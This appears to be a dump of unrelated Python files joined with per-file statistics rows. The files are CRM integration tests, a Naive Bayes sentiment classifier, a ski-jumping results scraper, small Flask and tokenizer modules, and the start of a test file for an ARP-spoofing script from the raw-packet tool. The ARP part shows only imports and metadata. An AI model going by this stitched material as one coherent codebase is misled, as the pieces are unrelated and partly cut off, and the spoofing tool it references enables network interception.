assert ZenDeskSell().send_create_service(sample_service, sample_service.users[0])
convert_lead_to_contact_mock.assert_called_once_with(sample_service.users[0])
upsert_contact_mock.assert_called_once_with(sample_service.users[0], existing_contact_id)
upsert_deal_mock.assert_called_once_with(contact_id, sample_service, ZenDeskSell.STATUS_CREATE_TRIAL)
def test_send_go_live_request(notify_api: Flask, sample_service: Service, mocker: MockFixture):
    deal_id = "1"
    search_deal_id_mock = mocker.patch("app.user.rest.ZenDeskSell.search_deal_id", return_value=deal_id)
    send_create_service_mock = mocker.patch("app.user.rest.ZenDeskSell.send_create_service", return_value="1")
    create_note_mock = mocker.patch("app.user.rest.ZenDeskSell.create_note", return_value="2")
    data: Dict[str, Any] = {
        "email_address": "test@email.com",
        "service_name": "service_name",
        "department_org_name": "department_org_name",
        "intended_recipients": "intended_recipients",
        "main_use_case": "main_use_case",
        "notification_types": "notification_types",
        "expected_volume": "expected_volume",
        "service_url": "service_url",
        "support_type": "go_live_request",
    }
    contact = ContactRequest(**data)

    with notify_api.app_context():
        assert ZenDeskSell().send_go_live_request(sample_service, sample_service.users[0], contact)

        search_deal_id_mock.assert_called_once_with(sample_service)
        send_create_service_mock.assert_not_called()
        create_note_mock.assert_called_once_with(ZenDeskSell.NoteResourceType.DEAL, deal_id, contact)
def test_send_go_live_request_search_failed(notify_api: Flask, sample_service: Service, mocker: MockFixture):
    deal_id = "1"
    search_deal_id_mock = mocker.patch("app.user.rest.ZenDeskSell.search_deal_id", return_value=None)
    send_create_service_mock = mocker.patch("app.user.rest.ZenDeskSell.send_create_service", return_value=deal_id)
    create_note_mock = mocker.patch("app.user.rest.ZenDeskSell.create_note", return_value="1")
    data: Dict[str, Any] = {
        "email_address": "test@email.com",
        "service_name": "service_name",
        "department_org_name": "department_org_name",
        "intended_recipients": "intended_recipients",
        "main_use_case": "main_use_case",
        "notification_types": "notification_types",
        "expected_volume": "expected_volume",
        "service_url": "service_url",
        "support_type": "go_live_request",
    }
    contact = ContactRequest(**data)

    with notify_api.app_context():
        assert ZenDeskSell().send_go_live_request(sample_service, sample_service.users[0], contact)

        search_deal_id_mock.assert_called_once_with(sample_service)
        send_create_service_mock.assert_called_once_with(sample_service, sample_service.users[0])
        create_note_mock.assert_called_once_with(ZenDeskSell.NoteResourceType.DEAL, deal_id, contact)
def test_send_go_live_service(notify_api: Flask, sample_service: Service, mocker: MockFixture):
    contact_id = 1
    upsert_contact_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_contact", return_value=(contact_id, True))
    upsert_deal_mock = mocker.patch("app.user.rest.ZenDeskSell.upsert_deal", return_value=1)

    with notify_api.app_context():
        assert ZenDeskSell().send_go_live_service(sample_service, sample_service.users[0])

        upsert_contact_mock.assert_called_once_with(sample_service.users[0], None)
        upsert_deal_mock.assert_called_once_with(contact_id, sample_service, ZenDeskSell.STATUS_CLOSE_LIVE)
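The tests above all follow one pattern: patch a `ZenDeskSell` method, exercise the code path, then assert on the recorded call arguments. A minimal standalone sketch of that `unittest.mock` pattern (the `Seller` class below is hypothetical, not part of the application under test):

```python
from unittest import mock


class Seller:
    def upsert_deal(self, contact_id):
        raise RuntimeError("real network call")  # never reached while patched

    def go_live(self, contact_id):
        # Treat a None return from upsert_deal as success.
        return self.upsert_deal(contact_id) is None


with mock.patch.object(Seller, "upsert_deal", return_value=None) as deal_mock:
    assert Seller().go_live("1")

# The mock records every call, so arguments can be verified afterwards.
deal_mock.assert_called_once_with("1")
```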
| 39.230016 | 126 | 0.631113 | 2,755 | 24,048 | 5.180036 | 0.073321 | 0.046668 | 0.045267 | 0.033284 | 0.872399 | 0.84507 | 0.816131 | 0.797001 | 0.769883 | 0.746058 | 0 | 0.026641 | 0.24921 | 24,048 | 612 | 127 | 39.294118 | 0.763777 | 0.005489 | 0 | 0.632692 | 0 | 0.003846 | 0.22791 | 0.052524 | 0 | 0 | 0 | 0 | 0.073077 | 1 | 0.053846 | false | 0 | 0.017308 | 0.003846 | 0.092308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b2cc68b36f74374f809c38b4a5341aa5d5152a70 | 6,193 | py | Python | HWs/CS464-Spring19-HWs/HW-1/code/tester.py | metehkaya/Bilkent-BSc-CS-Projects-and-HWs | bbc04b5207cf0b091d48cc2c26dfc75d6174505a | [
"MIT"
] | null | null | null | HWs/CS464-Spring19-HWs/HW-1/code/tester.py | metehkaya/Bilkent-BSc-CS-Projects-and-HWs | bbc04b5207cf0b091d48cc2c26dfc75d6174505a | [
"MIT"
] | null | null | null | HWs/CS464-Spring19-HWs/HW-1/code/tester.py | metehkaya/Bilkent-BSc-CS-Projects-and-HWs | bbc04b5207cf0b091d48cc2c26dfc75d6174505a | [
"MIT"
] | null | null | null | import math
def multinomial_naive_bayes(train_pis, test_features_matrix, train_theta_t):
    n_tweet = len(test_features_matrix)
    n_feature = len(test_features_matrix[0])
    test_result = []
    for tweet in range(n_tweet):
        score = [0, 0, 0]
        for k in range(3):
            score[k] = math.log(train_pis[k])
            for feature in range(n_feature):
                theta = train_theta_t[feature][k]
                test_feature = test_features_matrix[tweet][feature]
                if theta == 0:
                    if test_feature == 0:
                        score[k] += 0
                    else:
                        score[k] += -math.inf
                else:
                    score[k] += test_feature * math.log(theta)
        best_label = -1
        best_score = -1
        for k in range(3):
            if score[k] > best_score or best_label == -1:
                best_score = score[k]
                best_label = k
        if math.fabs(score[1] - score[2]) < 0.000001:
            best_label = 0
        if best_label == 0:
            test_result.append('neutral')
        elif best_label == 1:
            test_result.append('positive')
        elif best_label == 2:
            test_result.append('negative')
    return test_result
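A self-contained sketch of the scoring rule used above, on hypothetical toy data (two classes, three vocabulary words): each class score is the log prior plus count-weighted log word probabilities, and the argmax wins.

```python
import math

priors = [0.5, 0.5]              # class priors (train_pis)
thetas = [[0.7, 0.2, 0.1],       # per-class word probabilities
          [0.1, 0.2, 0.7]]
counts = [3, 0, 1]               # word counts for one tweet

scores = []
for k in range(2):
    s = math.log(priors[k])
    for f, c in enumerate(counts):
        if thetas[k][f] == 0:
            # A word never seen in class k with a nonzero count rules the class out.
            s += 0 if c == 0 else -math.inf
        else:
            s += c * math.log(thetas[k][f])
    scores.append(s)

best = max(range(2), key=lambda k: scores[k])
print(best)  # -> 0: class 0 puts high probability on the frequent word
```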
'''
def naive_bayes(train_pis, test_features_matrix, train_theta_t):
    n_tweet = len(test_features_matrix)
    n_feature = len(test_features_matrix[0])
    test_result = []
    for tweet in range(n_tweet):
        score = [0, 0, 0]
        minf = [0, 0, 0]
        for k in range(3):
            score[k] = math.log(train_pis[k])
            for feature in range(n_feature):
                theta = train_theta_t[feature][k]
                test_feature = test_features_matrix[tweet][feature]
                if theta == 0:
                    if test_feature == 0:
                        score[k] += 0
                    else:
                        minf[k] += 1
                else:
                    score[k] += test_feature * math.log(theta)
        best_label = -1
        best_score = -1
        best_minf = n_feature + 5
        for k in range(3):
            if best_label == -1 or (minf[k] < best_minf) or (minf[k] == best_minf and score[k] > best_score):
                best_minf = minf[k]
                best_score = score[k]
                best_label = k
        if minf[1] == minf[2] and math.fabs(score[1] - score[2]) < 0.000001:
            best_label = 0
        if best_label == 0:
            test_result.append('neutral')
        elif best_label == 1:
            test_result.append('positive')
        elif best_label == 2:
            test_result.append('negative')
    return test_result
'''
def bernoulli_naive_bayes(train_pis, test_features_matrix, train_theta_s):
    n_tweet = len(test_features_matrix)
    n_feature = len(test_features_matrix[0])
    test_result = []
    for tweet in range(n_tweet):
        score = [0, 0, 0]
        for k in range(3):
            score[k] = math.log(train_pis[k])
            for feature in range(n_feature):
                theta = train_theta_s[feature][k]
                test_feature = min(test_features_matrix[tweet][feature], 1)
                value = test_feature * theta + (1-test_feature) * (1-theta)
                if value == 0:
                    score[k] += -math.inf
                else:
                    score[k] += math.log(value)
        best_label = -1
        best_score = -1
        for k in range(3):
            if best_label == -1 or score[k] > best_score:
                best_score = score[k]
                best_label = k
        if math.fabs(score[1] - score[2]) < 0.000001:
            best_label = 0
        if best_label == 0:
            test_result.append('neutral')
        elif best_label == 1:
            test_result.append('positive')
        elif best_label == 2:
            test_result.append('negative')
    return test_result
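The Bernoulli variant above uses only word presence/absence: counts are binarized, and each feature contributes `x*theta + (1-x)*(1-theta)`. A standalone sketch with hypothetical numbers:

```python
import math

priors = [0.5, 0.5]
thetas = [[0.9, 0.1, 0.5],   # P(word present | class)
          [0.1, 0.8, 0.5]]
counts = [2, 0, 1]           # raw counts; only presence/absence is used

scores = []
for k in range(2):
    s = math.log(priors[k])
    for f, c in enumerate(counts):
        x = min(c, 1)  # binarize the count
        value = x * thetas[k][f] + (1 - x) * (1 - thetas[k][f])
        s += math.log(value) if value > 0 else -math.inf
    scores.append(s)

best = max(range(2), key=lambda k: scores[k])
print(best)  # -> 0
```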
'''
def bernoulli_naive_bayes(train_pis, test_features_matrix, train_theta_s):
    n_tweet = len(test_features_matrix)
    n_feature = len(test_features_matrix[0])
    test_result = []
    for tweet in range(n_tweet):
        score = [0, 0, 0]
        score_log = [0, 0, 0]
        minf = [0, 0, 0]
        for k in range(3):
            score[k] = math.log(train_pis[k])
            for feature in range(n_feature):
                theta = train_theta_s[feature][k]
                test_feature = min(test_features_matrix[tweet][feature], 1)
                value = test_feature * theta + (1-test_feature) * (1-theta)
                if value == 0:
                    minf[k] += 1
                else:
                    score_log[k] += math.log(value)
            score[k] += score_log[k]
        best_label = -1
        best_score = -1
        best_minf = n_feature + 5
        for k in range(3):
            if best_label == -1 or (minf[k] < best_minf) or (minf[k] == best_minf and score[k] > best_score):
                best_minf = minf[k]
                best_score = score[k]
                best_label = k
        if minf[1] == minf[2] and math.fabs(score[1] - score[2]) < 0.000001:
            best_label = 0
        if best_label == 0:
            test_result.append('neutral')
        elif best_label == 1:
            test_result.append('positive')
        elif best_label == 2:
            test_result.append('negative')
    return test_result
'''
def get_class_id(label):
    if label == 'neutral':
        return 0
    elif label == 'positive':
        return 1
    elif label == 'negative':
        return 2
    return -1
def find_accuracy(test_result, test_labels):
    correct = 0
    failure = 0
    counter = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
    n_tweet = len(test_result)
    for tweet in range(n_tweet):
        prediction = get_class_id(test_result[tweet])
        actual = get_class_id(test_labels[tweet])
        counter[prediction][actual] += 1
        if test_result[tweet] == test_labels[tweet]:
            correct += 1
        else:
            failure += 1
    print('correct: ', correct)
    print('failure: ', failure)
    print('accuracy: ', float(correct) / (correct + failure))
    print('counter: ', counter)
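`find_accuracy` builds a 3x3 confusion matrix indexed as `counter[prediction][actual]`. A standalone sketch of the same bookkeeping on a hypothetical four-tweet sample:

```python
labels = ['neutral', 'positive', 'negative']
predicted = ['neutral', 'positive', 'negative', 'positive']
actual = ['neutral', 'negative', 'negative', 'positive']

idx = {name: i for i, name in enumerate(labels)}
counter = [[0] * 3 for _ in range(3)]  # counter[prediction][actual]
correct = 0
for p, a in zip(predicted, actual):
    counter[idx[p]][idx[a]] += 1
    correct += p == a  # bool adds as 0/1

accuracy = correct / len(predicted)
print(accuracy)  # -> 0.75: one positive prediction was actually negative
```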
| 34.597765 | 109 | 0.52527 | 795 | 6,193 | 3.865409 | 0.077987 | 0.082005 | 0.093719 | 0.05467 | 0.841198 | 0.826228 | 0.826228 | 0.814514 | 0.801497 | 0.801497 | 0 | 0.034666 | 0.36186 | 6,193 | 178 | 110 | 34.792135 | 0.742915 | 0 | 0 | 0.566667 | 0 | 0 | 0.032073 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.011111 | 0 | 0.122222 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b2e3b07bcfb8632ecae6a12475b580ccf0420bd0 | 144 | py | Python | transcription_compare/tokenizer/__init__.py | HannaHUp/transcription-compare | e25d9651e604a854acba9659602ae1ea5497169e | [
"MIT"
] | 2 | 2019-09-03T13:26:55.000Z | 2020-08-04T20:32:35.000Z | transcription_compare/tokenizer/__init__.py | HannaHUp/transcription-compare | e25d9651e604a854acba9659602ae1ea5497169e | [
"MIT"
] | null | null | null | transcription_compare/tokenizer/__init__.py | HannaHUp/transcription-compare | e25d9651e604a854acba9659602ae1ea5497169e | [
"MIT"
] | null | null | null | from .abstract_tokenizer import AbstractTokenizer
from .character_tokenizer import CharacterTokenizer
from .word_tokenizer import WordTokenizer
| 36 | 51 | 0.895833 | 15 | 144 | 8.4 | 0.6 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 144 | 3 | 52 | 48 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
654a721337574b3ca73fe38985f4aa469a26af02 | 8,981 | py | Python | UstvarjanjeSQL/UstvarjanjeSQL rezultatov.py | MartinDolenc/Skoki | 23877d02d8fbbd80defbb6276adfe636a543530a | [
"MIT"
] | null | null | null | UstvarjanjeSQL/UstvarjanjeSQL rezultatov.py | MartinDolenc/Skoki | 23877d02d8fbbd80defbb6276adfe636a543530a | [
"MIT"
] | null | null | null | UstvarjanjeSQL/UstvarjanjeSQL rezultatov.py | MartinDolenc/Skoki | 23877d02d8fbbd80defbb6276adfe636a543530a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Import the required libraries
from lxml import html
import requests
import csv
import re
import pandas as pd
import sqlalchemy
import sqlite3
import itertools


def text(tag):
    parts = [tag.text] + [text(t) for t in tag] + [tag.tail]
    if tag.tag == 'br':
        parts.insert(0, ' ')
    return re.sub(r'\s+', ' ', ''.join(filter(None, parts)))


# for individual competitions
link = "https://www.fis-ski.com/DB/general/results.html?sectorcode=JP&raceid=2832"
stran = html.fromstring(requests.get(link).content)

if len([text(r).replace('*', '').strip() for r in
        stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right hidden-xs pale']")]) > 2:
    ranki = [text(r).replace('*', '').strip() for r in
             stran.xpath("//div[@class='g-lg-1 g-md-1 g-sm-1 g-xs-2 justify-right pr-1 gray bold']")]
    startnaStevilka = [text(r).replace('*', '').strip() for r in
                       stran.xpath(
                           "//div[@class='g-lg-1 g-md-1 g-sm-1 justify-right hidden-xs pr-1 gray']")]
    fisCode = [text(r).replace('*', '').strip() for r in
               stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 hidden-xs justify-right gray pr-1']")]
    drzava = [text(r).replace('*', '').strip() for r in
              stran.xpath("//div[@id='events-info-results']//span[@class='country__name-short']")]
    skokiInRezultati = [text(r).replace('*', '').strip() for r in
                        stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right bold hidden-xs']")]
    skoki = skokiInRezultati[0:][::2]
    rezultati = skokiInRezultati[1:][::2]
    # skoki = skoki[:len(drzava)]
    # rezultati = rezultati[:len(drzava)]
    ranki = ranki[:len(drzava)]
    fisCode = fisCode[:len(drzava)]
    startnaStevilka = startnaStevilka[:len(drzava)]
    ranki = list(itertools.chain(*zip(ranki, ranki)))
    startnaStevilka = list(itertools.chain(*zip(startnaStevilka, startnaStevilka)))
    fisCode = list(itertools.chain(*zip(fisCode, fisCode)))
    serija = list(itertools.chain(*zip(['1'] * (len(ranki) // 2), ['2'] * (len(ranki) // 2))))
    mesto_v_ekipi = [''] * len(serija)
    drzava = list(itertools.chain(*zip(drzava, drzava)))
    skoki = skoki[:len(drzava)]
    rezultati = rezultati[:len(drzava)]
else:
    ranki = [text(r).replace('*', '').strip() for r in
             stran.xpath("//div[@class='g-lg-1 g-md-1 g-sm-1 g-xs-2 justify-right pr-1 gray bold']")]
    startnaStevilka = [text(r).replace('*', '').strip() for r in
                       stran.xpath(
                           "//div[@class='g-lg-1 g-md-1 g-sm-1 justify-right hidden-xs pr-1 gray']")]
    fisCode = [text(r).replace('*', '').strip() for r in
               stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 hidden-xs justify-right gray pr-1']")]
    drzava = [text(r).replace('*', '').strip() for r in
              stran.xpath("//div[@id='events-info-results']//span[@class='country__name-short']")]
    skokiInRezultati = [text(r).replace('*', '').strip() for r in
                        stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right bold hidden-xs']")]
    skoki = skokiInRezultati[0:][::2]
    rezultati = skokiInRezultati[1:][::2]
    skoki = skoki[:len(drzava)]
    rezultati = rezultati[:len(drzava)]
    ranki = ranki[:len(drzava)]
    fisCode = fisCode[:len(drzava)]
    startnaStevilka = startnaStevilka[:len(drzava)]
    serija = ['1'] * len(ranki)
    mesto_v_ekipi = [''] * len(serija)

if (len(skoki) != 0) or (len(rezultati) != 0):
    print('not equal to 0')
else:
    print('equal to 0')
    serija = ['3'] * len(ranki)
    rez = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-3 g-xs-5 justify-right blue bold ']")]
    rezultati = rez[:len(serija)]
    skoki = [''] * len(serija)
print(ranki)
print(startnaStevilka)
print(fisCode)
print(drzava)
print(skoki)
print(rezultati)
print(serija)
print(mesto_v_ekipi)
print([len(ranki), len(startnaStevilka), len(fisCode), len(drzava), len(skoki), len(rezultati), len(serija), len(mesto_v_ekipi)])
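The repeated `list(itertools.chain(*zip(x, x)))` idiom above duplicates each element in place, so per-athlete rows can be expanded into one row per jump series. A quick standalone illustration:

```python
import itertools

ranks = ['1', '2', '3']
# Duplicate every element: one copy per jump series.
doubled = list(itertools.chain(*zip(ranks, ranks)))
# Alternating series labels line up with the duplicated rows.
series = list(itertools.chain(*zip(['1'] * len(ranks), ['2'] * len(ranks))))
print(doubled)  # -> ['1', '1', '2', '2', '3', '3']
print(series)   # -> ['1', '2', '1', '2', '1', '2']
```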
'''
# for team events
link = "https://www.fis-ski.com/DB/general/results.html?sectorcode=JP&raceid=5276"
stran = html.fromstring(requests.get(link).content)

if len([text(r).replace('*', '').strip() for r in
        stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right hidden-xs text-right pale']")]) > 2:
    ranki = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-1 g-md-1 g-sm-1 g-xs-2 justify-right bold pr-1']")]
    fisCode = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-3 hidden-xs justify-right gray pr-1']")]
    drzava1 = [text(r).replace('*', '').strip() for r in stran.xpath("//a[@class='table-row table-row_theme_main']")]
    skokiInRezultati = [text(r).replace('*', '').strip() for r in stran.xpath("//a[@class='table-row table-row_theme_additional']//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right bold hidden-xs']")]
    ranki = list(itertools.chain(*zip(ranki, ranki)))
    ranki = list(itertools.chain(*zip(ranki, ranki)))
    ranki = list(itertools.chain(*zip(ranki, ranki)))
    print(len(skokiInRezultati))
    skoki = skokiInRezultati[0:][::2]
    rezultati = skokiInRezultati[1:][::2]
    fisCodeReal = []
    for str in fisCode:
        if len(str) == 4:
            fisCodeReal.append(str)
    fisCodeReal = list(itertools.chain(*zip(fisCodeReal, fisCodeReal)))
    serija = list(itertools.chain(*zip(['1'] * (len(ranki) // 2), ['2'] * (len(ranki) // 2))))
    mesto_v_ekipi = ['1', '2', '3', '4'] * (len(ranki) // 8)
    mesto_v_ekipi = list(itertools.chain(*zip(mesto_v_ekipi, mesto_v_ekipi)))
    # rezultati = list(filter(None, rezultati))
    # skoki = list(filter(None, skoki))
    startnaStevilka = [''] * len(ranki)
    drzava = []
    for str in drzava1:
        drzava.append(str.split()[-2])
    drzava = list(itertools.chain(*zip(drzava, drzava)))
    drzava = list(itertools.chain(*zip(drzava, drzava)))
    drzava = list(itertools.chain(*zip(drzava, drzava)))
    fisCode = fisCodeReal
else:
    ranki = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-1 g-md-1 g-sm-1 g-xs-2 justify-right bold pr-1']")]
    fisCode = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-3 hidden-xs justify-right gray pr-1']")]
    drzava1 = [text(r).replace('*', '').strip() for r in stran.xpath("//a[@class='table-row table-row_theme_main']")]
    skokiInRezultati = [text(r).replace('*', '').strip() for r in stran.xpath("//a[@class='table-row table-row_theme_additional']//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right bold hidden-xs']")]
    ranki = list(itertools.chain(*zip(ranki, ranki)))
    ranki = list(itertools.chain(*zip(ranki, ranki)))
    print(len(skokiInRezultati))
    skoki = skokiInRezultati[0:][::2]
    rezultati = skokiInRezultati[1:][::2]
    fisCodeReal = []
    for str in fisCode:
        if len(str) == 4:
            fisCodeReal.append(str)
    serija = ['1'] * len(ranki)
    mesto_v_ekipi = ['1', '2', '3', '4'] * (len(ranki) // 4)
    # rezultati = list(filter(None, rezultati))
    # skoki = list(filter(None, skoki))
    startnaStevilka = [''] * len(ranki)
    drzava = []
    for str in drzava1:
        drzava.append(str.split()[-2])
    drzava = list(itertools.chain(*zip(drzava, drzava)))
    drzava = list(itertools.chain(*zip(drzava, drzava)))
    fisCode = fisCodeReal

print(ranki)
print(startnaStevilka)
print(fisCode)
print(drzava)
print(skoki)
print(rezultati)
print(serija)
print(mesto_v_ekipi)
print([len(ranki), len(startnaStevilka), len(fisCode), len(drzava), len(skoki), len(rezultati), len(serija), len(mesto_v_ekipi)])

# link = "https://www.fis-ski.com/DB/general/results.html?sectorcode=JP&raceid=4862"
# stran = html.fromstring(requests.get(link).content)
# print(len([text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right hidden-xs pale']")]))

# link = "https://www.fis-ski.com/DB/general/results.html?sectorcode=JP&raceid=4861"
# stran = html.fromstring(requests.get(link).content)
# print('Team' in [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='g-lg-2 g-md-2 g-sm-2 justify-right hidden-xs pale']")][0])

# The URL we scrape data from
# link = "https://www.fis-ski.com/DB/ski-jumping/biographies.html?lastname=&firstname=&sectorcode=JP&gendercode=M&birthyear=&skiclub=&skis=&nationcode=&fiscode=&status=&search=true&limit=1000&offset=5000"
# stran = html.fromstring(requests.get(link).content)
# drzava = [text(r).replace('*', '').strip() for r in stran.xpath("//div[@class='table__body']")[0]
#           .xpath("//span[@class='country__name-short']")]
'''
| 38.711207 | 204 | 0.603719 | 1,277 | 8,981 | 4.216132 | 0.117463 | 0.009658 | 0.053492 | 0.07578 | 0.845097 | 0.83711 | 0.83711 | 0.803678 | 0.778046 | 0.771545 | 0 | 0.020882 | 0.189511 | 8,981 | 231 | 205 | 38.878788 | 0.71878 | 0.014586 | 0 | 0.506329 | 0 | 0.139241 | 0.238264 | 0.034509 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012658 | false | 0 | 0.101266 | 0 | 0.126582 | 0.139241 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3334b3ed93786359ecb56e59674d5ac4b3092a9b | 158 | py | Python | eds/openmtc-gevent/server/openmtc-ngsi/openmtc-ngsi-pylibs/flask/testsuite/test_apps/moduleapp/apps/frontend/__init__.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | eds/openmtc-gevent/server/openmtc-ngsi/openmtc-ngsi-pylibs/flask/testsuite/test_apps/moduleapp/apps/frontend/__init__.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | eds/openmtc-gevent/server/openmtc-ngsi/openmtc-ngsi-pylibs/flask/testsuite/test_apps/moduleapp/apps/frontend/__init__.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | from flask import Module, render_template
frontend = Module(__name__)
@frontend.route('/')
def index():
    return render_template('FrontEnd/motor.html')
| 15.8 | 49 | 0.740506 | 19 | 158 | 5.842105 | 0.736842 | 0.252252 | 0.396396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132911 | 158 | 9 | 50 | 17.555556 | 0.810219 | 0 | 0 | 0 | 0 | 0 | 0.126582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
686fc4e18637b31019062d7f770fcfac86f4e090 | 24 | py | Python | wendigo/application/__init__.py | medmsyk/wendigopy | 36e0759bf8b065548fd638063768522704506236 | [
"Apache-2.0"
] | null | null | null | wendigo/application/__init__.py | medmsyk/wendigopy | 36e0759bf8b065548fd638063768522704506236 | [
"Apache-2.0"
] | 1 | 2022-01-05T10:28:49.000Z | 2022-03-20T09:17:04.000Z | wendigo/application/__init__.py | medmsyk/wendigopy | 36e0759bf8b065548fd638063768522704506236 | [
"Apache-2.0"
] | null | null | null | from .dll import Wendigo | 24 | 24 | 0.833333 | 4 | 24 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 24 | 1 | 24 | 24 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6895684e92084ac85c5d46c4b6ddedc1bfa8cad4 | 60 | py | Python | theory/slides-2-0/topic-2-interactive-programs/python/integers.py | dgrafov/redi-python-intro | bbb29e58cd75602b720be5f7695fa4a66db521dd | [
"MIT"
] | 8 | 2018-01-30T10:40:32.000Z | 2018-09-08T21:08:03.000Z | theory/slides-2-0/topic-2-interactive-programs/python/integers.py | dgrafov/redi-python-intro | bbb29e58cd75602b720be5f7695fa4a66db521dd | [
"MIT"
] | null | null | null | theory/slides-2-0/topic-2-interactive-programs/python/integers.py | dgrafov/redi-python-intro | bbb29e58cd75602b720be5f7695fa4a66db521dd | [
"MIT"
] | 5 | 2018-02-08T18:02:34.000Z | 2019-10-05T17:51:23.000Z | num = 3
print(num, type(num))
Num = -5
print(Num, type(Num)) | 15 | 21 | 0.633333 | 12 | 60 | 3.166667 | 0.416667 | 0.421053 | 0.631579 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039216 | 0.15 | 60 | 4 | 22 | 15 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
68a010e9103b38ea63b73bace8837d878b86dc77 | 8,111 | py | Python | raw_packet/Tests/Unit_tests/Scripts/ARP/test_arp_spoof.py | 4ekin/raw-packet | 40322ec2f6c3ce0647ba69283df40fa8da4817e2 | [
"MIT"
] | null | null | null | raw_packet/Tests/Unit_tests/Scripts/ARP/test_arp_spoof.py | 4ekin/raw-packet | 40322ec2f6c3ce0647ba69283df40fa8da4817e2 | [
"MIT"
] | null | null | null | raw_packet/Tests/Unit_tests/Scripts/ARP/test_arp_spoof.py | 4ekin/raw-packet | 40322ec2f6c3ce0647ba69283df40fa8da4817e2 | [
"MIT"
] | null | null | null | # region Description
"""
test_arp_spoof.py: Unit tests for Raw-packet script: arp_spoof.py
Author: Vladimir Ivanov
License: MIT
Copyright 2020, Raw-packet Project
"""
# endregion
# region Import
from sys import path
from os.path import dirname, abspath, isfile
from os import remove, kill
from signal import SIGTERM
from time import sleep
from subprocess import run, PIPE, Popen
from scapy.all import rdpcap, ARP
from typing import IO
import unittest
# endregion
# region Authorship information
__author__ = 'Vladimir Ivanov'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
